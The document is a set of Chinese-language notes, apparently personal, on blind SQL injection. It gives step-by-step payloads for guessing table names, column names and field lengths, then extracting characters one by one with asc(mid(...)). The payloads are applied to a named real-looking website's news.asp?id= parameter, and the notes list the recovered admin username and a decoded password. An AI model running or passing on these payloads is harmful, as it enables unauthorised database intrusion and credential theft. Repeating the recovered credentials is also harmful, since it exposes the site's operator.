第一步：判断环境，寻找注入点

and exists (select * from 表名)，如果存在该表名，返回正常，不存在返回错误；

第三步：猜解字段

and exists (selsect 字段名 from 表名)

第四步：猜解字段长度(即猜解账号密码位数)

and (selsect top 1 len(字段名 )from 表名)>0（从0开始依次随意递增，直到页面显示不正常，最后用等=确定位数）

mysql测试失败，原因暂时不知；

第五步：折半法猜出--重要关键的一环      猜密码   =0
and (select top 1 asc(mid(字段,1,1)) from 表名)>0    

and(select top 1 asc(mid(admin_name,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,1,1))from admin)=97
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,2,1))from admin)=100
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,3,1))from admin)=109
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,4,1))from admin)=105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,5,1))from admin)=110

97,100,109,105,110     用户名：admin     密码：liuguoping


and(select top 1 asc(mid(admin_pass,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,1,1))from admin)=108
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,2,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,3,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,4,1))from admin)>103
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,5,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,6,1))from admin)>111
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,7,1))from admin)>112
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,8,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,9,1))from admin)>110
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,10,1))from admin)>103

108,105,117,103,117,111,112,105,110,103